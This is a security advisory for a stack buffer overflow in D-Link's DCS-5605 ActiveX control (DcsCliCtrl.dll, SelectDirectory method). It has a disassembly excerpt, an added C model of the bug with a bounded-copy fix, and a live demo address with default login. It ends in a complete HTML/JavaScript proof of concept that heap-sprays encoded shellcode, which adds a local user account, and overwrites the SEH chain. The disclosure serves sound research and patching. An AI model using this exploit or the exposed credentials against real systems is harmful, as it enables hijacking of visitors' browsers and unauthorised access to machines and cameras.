D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability

tested against: Microsoft Windows Server 2003 R2 SP2
                Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description:
"The DCS-5605 is a high performance camera for professional surveillance and remote monitoring. This network camera features motorized pan, tilt, and optical/digital zoom for ultimate versatility. The 10x optical zoom lens delivers the level of detail necessary to identify faces, license plate numbers, and other important details that are difficult to clearly distinguish using digital zoom alone"

background:
When browsing the device web interface, the user is asked to install an ActiveX control to stream video content. This control has the following settings:

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

Because the control reports itself safe for scripting and safe for initialization through IObjectSafety, once it is installed Internet Explorer lets any web page instantiate it and call its methods without a prompt.

Vulnerability:
The ActiveX control exposes the SelectDirectory() method, which takes one optional argument. See typelib:

...
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
    /* VT_VARIANT [12] [in] */ $varDefPath
) {
    /* method SelectDirectory */
}
...

This method suffers from a stack-based buffer overflow because of an unchecked lstrcpyW() call inside DcsCliCtrl.dll. The function below zeroes a 0x208-byte (520-byte, i.e. MAX_PATH UTF-16 characters) buffer on the stack and then copies the caller-supplied string into it with lstrcpyW(), which stops only at the terminating NUL and never looks at the destination size:

...
100712E0  81EC 34040000     sub esp,434
100712E6  A1 2C841010       mov eax,dword ptr ds:[1010842C]
100712EB  33C4              xor eax,esp
100712ED  898424 30040000   mov dword ptr ss:[esp+430],eax
100712F4  53                push ebx
100712F5  8B9C24 48040000   mov ebx,dword ptr ss:[esp+448]
100712FC  55                push ebp
100712FD  8BAC24 40040000   mov ebp,dword ptr ss:[esp+440]
10071304  56                push esi
10071305  8BB424 4C040000   mov esi,dword ptr ss:[esp+44C]
1007130C  57                push edi
1007130D  8BBC24 4C040000   mov edi,dword ptr ss:[esp+44C]
10071314  68 08020000       push 208
10071319  8D4424 34         lea eax,dword ptr ss:[esp+34]
1007131D  6A 00             push 0
1007131F  50                push eax
10071320  E8 0BC40300       call DcsCliCt.100AD730
10071325  83C4 0C           add esp,0C
10071328  85F6              test esi,esi
1007132A  74 0C             je short DcsCliCt.10071338
1007132C  56                push esi
1007132D  8D4C24 34         lea ecx,dword ptr ss:[esp+34]
10071331  51                push ecx
10071332  FF15 D4D20C10     call dword ptr ds:[<&KERNEL32.lstrcpyW>]   ; kernel32.lstrcpyW <-------------
...

An attacker could entice a remote user to browse a web page and gain control of the victim's browser by passing an overlong string to the mentioned method and overwriting critical structures (SEH). Note that the prologue stores a /GS stack cookie (loaded at 100712E6, xored with esp and saved at esp+430), so the cookie check in the epilogue would catch a plain return-address overwrite; the proof of concept instead relies on the SEH chain being overwritten, which is consulted when an exception is raised before that check ever runs.

Proof of concept code is attached. Note, to reproduce the wanted crash: when the SelectDirectory() method is called, the user is asked to select a destination folder for the stream recorder. To set EIP to 0x0c0c0c0c, select a folder of choice, then proceed. Clicking Cancel gives a crash that is not useful as is; however, by modifying the PoC it could be possible to get EIP overwritten in that path as well. I think it is also possible that other products carry this dll; I could post an update if I find more.
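The C below is an added example, not code from the advisory, from rgod or from D-Link. It models the copy visible in the listing above (a 0x208-byte stack buffer inside a 0x434-byte frame, filled by lstrcpyW() with no length check) and places a bounded replacement beside it. UTF-16 units are modelled as uint16_t so it compiles anywhere; the function names and the constructed test strings are assumptions for illustration.

```c
/*
 * Added example (not from the advisory or from D-Link). Sizes are taken from
 * the DcsCliCtrl.dll listing: "push 208" before the zeroing call gives the
 * buffer size, "sub esp,434" the whole stack frame. Function names are
 * hypothetical; inputs are constructed here.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BUF_BYTES   0x208u              /* push 208: bytes zeroed at esp+34      */
#define BUF_UNITS   (BUF_BYTES / 2u)    /* 260 UTF-16 units, i.e. MAX_PATH       */
#define FRAME_BYTES 0x434u              /* sub esp,434: size of the local frame  */

/* lstrlenW equivalent: UTF-16 units before the terminator. */
static size_t u16_len(const uint16_t *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* Bytes lstrcpyW writes for a string of `units` UTF-16 units: the characters
 * plus the terminator, with no regard for the destination size. */
static size_t copy_bytes(size_t units)
{
    return (units + 1) * 2;
}

/* Bytes written past the end of the 0x208-byte buffer, 0 if the copy fits. */
static size_t overflow_bytes(size_t units)
{
    size_t w = copy_bytes(units);
    return w > BUF_BYTES ? w - BUF_BYTES : 0;
}

/* Does the copy run out of the entire 0x434-byte frame (cookie and saved
 * return address sit at its top)? */
static int copy_exceeds_frame(size_t units)
{
    return copy_bytes(units) > FRAME_BYTES;
}

/* UTF-16 units the attached PoC passes: 200 x "%u4141%u4141" followed by
 * 700 x "%u0c0c%u0c0c"; each unescape() yields two units. */
static size_t poc_units(void)
{
    return 200u * 2u + 700u * 2u;
}

/* Bounded replacement for the lstrcpyW call: reject anything that does not
 * fit in 260 units including the terminator rather than truncating silently,
 * so a "default path" that is really a payload never reaches the buffer. On
 * Windows the equivalent check is StringCchCopyW(buf, BUF_UNITS, path) == S_OK. */
static int select_directory_safe(uint16_t buf[BUF_UNITS], const uint16_t *def_path)
{
    size_t n;
    if (def_path == NULL) {           /* the argument is optional (VT_VARIANT [in]) */
        buf[0] = 0;
        return 0;
    }
    n = u16_len(def_path);
    if (n >= BUF_UNITS)               /* n + 1 units would not fit: reject */
        return -1;
    for (size_t i = 0; i <= n; i++)   /* copies the terminator too */
        buf[i] = def_path[i];
    return 0;
}

/* Constructed input: `units` copies of `ch`, NUL-terminated. */
static void fill(uint16_t *s, size_t units, uint16_t ch)
{
    for (size_t i = 0; i < units; i++)
        s[i] = ch;
    s[units] = 0;
}

/* Builds a constructed string of `units` 'A' characters (capped to the scratch
 * buffer) and reports whether the bounded copy accepts it (0) or rejects it (-1). */
static int safe_accepts_units(size_t units)
{
    static uint16_t scratch[4096];
    uint16_t buf[BUF_UNITS];
    if (units > 4095)
        units = 4095;
    fill(scratch, units, 0x0041);
    return select_directory_safe(buf, scratch);
}

int main(void)
{
    size_t n = poc_units();
    printf("PoC passes %zu UTF-16 units; lstrcpyW writes %zu bytes into a %u-byte buffer, %zu bytes spill past it\n",
           n, copy_bytes(n), BUF_BYTES, overflow_bytes(n));
    printf("copy larger than the whole 0x%x-byte frame: %s\n",
           FRAME_BYTES, copy_exceeds_frame(n) ? "yes" : "no");
    printf("bounded copy: 259 units -> %d, 260 units -> %d, PoC string -> %d\n",
           safe_accepts_units(259), safe_accepts_units(260), safe_accepts_units(n));
    return 0;
}
```

The point of the bounded version is that it fails closed: a path of 260 or more units is refused outright, whereas a truncating copy would still let the control treat attacker-chosen bytes as a directory name.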
Additional note:

0:029> lm -vm DcsCliCtrl
start    end        module name
08450000 0859e000   DcsCliCtrl   (deferred)
    Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
    Image name: DcsCliCtrl.dll
    Timestamp:        Thu Aug 19 08:48:47 2010 (4C6CD3CF)
    CheckSum:         001325EC
    ImageSize:        0014E000
    File version:     1.0.0.4519
    Product version:  1.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04e4
    ProductName:      Camera Streaming Client
    InternalName:     DcsCliCtrl.dll
    OriginalFilename: DcsCliCtrl.dll
    ProductVersion:   1.0.0.1
    FileVersion:      1.0.0.4519
    FileDescription:  Camera Stream Client Control
    LegalCopyright:   Copyright: (c) All rights reserved.

<!--
D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability poc (ie7)

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
please select a directory to download ...
<object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0></object>
<script language='javascript'>
// heap spray; the shellcode adds a local user, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
                     "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
                     "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
                     "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
                     "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
                     "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
                     "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
                     "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
                     "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
                     "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
                     "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
                     "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
                     "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
                     "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
                     "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
                     "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
                     "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
                     "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
                     "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
                     "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
                     "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
                     "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
                     "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
                     "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
                     "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
                     "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
                     "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
                     "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
                     "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
                     "%u7734%u4734%u4570");
// 0x0c0c0c0c fills the sprayed blocks: it is both the address the overwrite
// points at and an "or al,0Ch" sled that slides into the shellcode
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (i = 0; i < 666; i++) { memory[i] = block + shellcode; }
</script>
<script defer=defer>
// overlong $varDefPath: 200 x 0x41414141 (800 bytes) overruns the 0x208-byte
// stack buffer, then 700 x 0x0c0c0c0c lands on the SEH record so the handler
// address points into the spray
var x = "";
for (i = 0; i < 200; i++) { x = x + unescape("%u4141%u4141"); }
for (i = 0; i < 700; i++) { x = x + unescape("%u0c0c%u0c0c"); }
obj.SelectDirectory(x);
</script>
</html>